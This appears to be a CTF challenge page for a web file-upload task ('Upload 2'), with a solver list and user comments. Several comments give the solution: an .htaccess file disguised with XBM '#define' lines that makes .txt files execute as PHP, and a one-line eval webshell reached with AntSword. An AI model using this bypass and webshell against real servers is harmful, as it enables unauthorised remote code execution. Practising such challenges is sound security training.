Upload 2WEB 未解决
分数:
0
金币:
0
题目作者:
未知
一 血:
Max_yiz
一血奖励:
0金币
解 决:
281
提 示:
描 述:
We used a blacklist now ... can you **access** the flag now?\n\n\n\
\ **Author**: souad
评分(2)
解题动态
不上早八 攻破了该题 2天前
ah990330230 攻破了该题 2天前
孙燕姿圈外男友 攻破了该题 2天前
5032894 攻破了该题 5天前
daqindiguo 攻破了该题 7天前
tcqctf 攻破了该题 7天前
无敌霸王龙 攻破了该题 8天前
mhxiaobai 攻破了该题 8天前
NiceNorth 攻破了该题 8天前
LondonBA 攻破了该题 28天前
ssoocc 攻破了该题 29天前
tyxr2015 攻破了该题 1月前
bugkuuin 攻破了该题 1月前
csk723 攻破了该题 1月前
瓦尔登湖水牛 攻破了该题 1月前
xiongh 攻破了该题 1月前
15679150282 攻破了该题 1月前
Ch3ss 攻破了该题 1月前
zhuohao 攻破了该题 1月前
评论
lunarbyside 3月前
举报
php被过滤了但是只有php才能运行,所以要把其他后缀文件解析为php来运行。#define width 1 换行 #define height 1 换行 Addtype application/x-httpd-php (自己定义的后缀,如.jpg) 写入.htaccess文件并上传, 才知道原来有这么一种文本类型的图片叫XBM,有用的知识增加了!
wywitkey 4月前
举报
1、上传.htaccess( 包含#define width #define height,这样服务器认为是一个图片文件 );2、上传一句话木马(木马文件格式根据htaccess文件中写的格式);3、蚁剑连接;4、flag.txt在根目录
vincentshine 10月前
举报
两点绕过,非php文件无法被执行,文件内容检查,修改apache配置文件,允许非php文件按照php文件运行执行。
HWHHJ 1年前
举报
逆天题目,还是能做
miko88 1年前
举报
上传的.htaccess和txt不在同一目录,是怎么做的啊
toxi 1年前
举报
只需要把文件后缀的.php换成.php5即可
啊这这 1年前
举报
题目非常好 不过我有个疑问 为什么我上传的shell木马中的提交参数函数必须是REQUEST还要是大写 我尝试了GET POST都不行 大写是语法只能是大写还是其他原因吗
xiaoxiao972521 1年前
举报
可以吧,$_GET $_REQUEST 都行,这些属于php函数,就是这个写法
我不知丢答案 1年前
举报
为什么我上传.user.ini文件去连的时候连不上??
JJhello 1年前
举报
接下面,内容为一句话木马,然后蚁剑连shell.txt的路径即可
JJhello 1年前
举报
上传一个文件名为 ".htaccess",注意,文件名前面没有任何东西的,文件内容为: #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 然后上传shell.txt,内容为
samRsa 1年前
举报
1、bp抓包上传.htaccess #define width 16 #define height 7 <FilesMatch \.txt$> SetHandler application/x-httpd-php </FilesMatch> 2、上传马 GIF89a <?php @eval($_POST['cmd']); ?>